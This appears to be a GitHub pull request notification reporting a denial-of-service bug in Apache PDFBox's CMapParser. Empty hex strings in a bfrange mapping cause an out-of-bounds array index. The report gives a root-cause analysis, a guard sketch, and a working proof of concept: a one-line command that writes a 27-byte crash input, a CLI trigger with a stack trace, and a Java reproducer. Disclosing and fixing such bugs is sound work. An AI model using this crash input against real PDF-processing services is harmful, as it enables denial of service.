OwenSanzas opened a new pull request, #411:
URL: https://github.com/apache/pdfbox/pull/411

   # ArrayIndexOutOfBoundsException in CMapParser.increment()
   
   ## Summary
   
   CMapParser in Apache PDFBox's fontbox component does not properly validate 
array bounds when processing bfrange mappings, causing an 
`ArrayIndexOutOfBoundsException` when processing malformed CMap data with empty 
hex strings.
   
   **Type**: Array Index Out-of-Bounds (CWE-129)
   **Severity**: Medium
   **Impact**: Denial of Service (application crash)
   **Affected Component**: `fontbox/src/main/java/org/apache/fontbox/cmap/CMapParser.java:813`
   
   ## Root Cause
   
   ### Vulnerable Code (CMapParser.java:454-467)
   
   ```java
   private void addMappingFrombfrange(CMap cmap, byte[] startCode, int values,
           byte[] tokenBytes)
   {
       for (int i = 0; i < values; i++)
       {
           String value = createStringFromBytes(tokenBytes);
           cmap.addCharMapping(startCode, value);
           if (!increment(tokenBytes, tokenBytes.length - 1, strictMode))
           {
               break;
           }
           // passes -1 when startCode.length == 0
           increment(startCode, startCode.length - 1, false);
       }
   }
   ```
   
   ### Crash Location (CMapParser.java:813)
   
   ```java
   private static boolean increment(byte[] data, int position, boolean useStrictMode)
   {
       // ...
       data[position] = (byte) (data[position] + 1);  // CRASH: data[-1]
   }
   ```
   
   When malformed CMap data contains empty hex strings (`<>`), `startCode` is a
zero-length byte array. `startCode.length - 1` then evaluates to -1, and that
value is passed to `increment()`, which throws when it accesses `data[-1]`.
Both overloads of `addMappingFrombfrange()` have this issue.
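
The missing check can be illustrated with a minimal, self-contained sketch. It is not the PDFBox source and not necessarily the change made in this pull request: `IncrementGuardSketch` and `guardedIncrement` are hypothetical names, and the carry logic is a simplified stand-in for `increment()` that omits the strict-mode flag. The only point is that an out-of-range position, such as the -1 produced by an empty array, is rejected before any array access.

```java
import java.util.Arrays;

// Hypothetical, simplified stand-in for CMapParser.increment(); NOT the PDFBox code.
final class IncrementGuardSketch {

    // Treats data[0..position] as a big-endian counter and adds 1 to it.
    // Returns false if the position is out of range (for example -1 for an
    // empty array) or if every byte was 0xFF and the counter wrapped to zero.
    static boolean guardedIncrement(byte[] data, int position) {
        if (data == null || position < 0 || position >= data.length) {
            return false; // nothing to increment; no array access is attempted
        }
        for (int i = position; i >= 0; i--) {
            if ((data[i] & 0xFF) != 0xFF) {
                data[i]++;      // no carry needed, done
                return true;
            }
            data[i] = 0;        // 0xFF rolls over, carry into the next byte
        }
        return false;           // all bytes were 0xFF
    }

    public static void main(String[] args) {
        byte[] empty = new byte[0]; // what an empty hex string "<>" decodes to
        System.out.println(guardedIncrement(empty, empty.length - 1)); // false

        byte[] code = {0x22, 0x23};
        boolean ok = guardedIncrement(code, code.length - 1);
        System.out.println(ok + " " + Arrays.toString(code)); // true [34, 36]
    }
}
```

With a guard of this kind, a caller such as `addMappingFrombfrange()` could stop iterating when the call returns false instead of letting the exception propagate. Whether to skip the mapping or reject the whole CMap is a separate design decision that this sketch does not address.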
   
   ## PoC
   
   ### Trigger file
   
   A crafted `malicious_cmap.pdf` with a Type0 font containing malformed CMap 
bfrange data with empty hex strings.
   
   ### How to generate crash.bin
   
   ```bash
   echo -n '0<>2.beginbfrange<><><2223' > crash.bin
   ```
   
   **Content** (27 bytes): CMap fragment with empty start/end codes in bfrange 
section.
   
   ### How to generate malicious_cmap.pdf
   
   ```bash
   python3 create_malicious_pdf_cmap.py
   ```
   
   ---
   
   ## Trigger Method 1: Official pdfbox-app CLI
   
   ```bash
   java -jar pdfbox-app-4.0.0-SNAPSHOT.jar export:text -i malicious_cmap.pdf -o output.txt
   ```
   
   **Output:**
   ```
   java.lang.ArrayIndexOutOfBoundsException: Index -1 out of bounds for length 0
        at org.apache.fontbox.cmap.CMapParser.increment(CMapParser.java:813)
        at org.apache.fontbox.cmap.CMapParser.addMappingFrombfrange(CMapParser.java:466)
        at org.apache.fontbox.cmap.CMapParser.parseBeginbfrange(CMapParser.java:437)
        at org.apache.fontbox.cmap.CMapParser.parse(CMapParser.java:118)
        at org.apache.pdfbox.pdmodel.font.CMapManager.parseCMap(CMapManager.java:72)
        at org.apache.pdfbox.pdmodel.font.PDFont.readCMap(PDFont.java:221)
   ```
   
   ---
   
   ## Trigger Method 2: Direct API
   
   ```java
   import org.apache.fontbox.cmap.CMap;
   import org.apache.fontbox.cmap.CMapParser;
   import org.apache.pdfbox.io.RandomAccessReadBuffer;
   
   public class Reproduce {
       public static void main(String[] args) throws Exception {
           byte[] cmapData = "1 beginbfrange\n<> <> <2223>\nendbfrange"
                   .getBytes("US-ASCII");
           CMapParser parser = new CMapParser();
           CMap cmap = parser.parse(new RandomAccessReadBuffer(cmapData));
           // ArrayIndexOutOfBoundsException: Index -1 out of bounds for length 0
       }
   }
   ```
   
   ---
   
   ## Impact
   
   | Aspect | Details |
   |--------|---------|
   | **Type** | Denial of Service (DoS) |
   | **Severity** | Medium |
   | **Attack Vector** | Malicious PDF with crafted Type0 font (malformed CMap) |
   | **Payload Size** | 27 bytes |
   | **Affected Operations** | Text extraction, rendering, any PDF processing with Type0 fonts |
   | **CWE** | CWE-129 (Improper Validation of Array Index) |
   | **Related** | PDFBOX-6141, PDFBOX-6142 (related fixes, but this case not covered) |
   
   ---



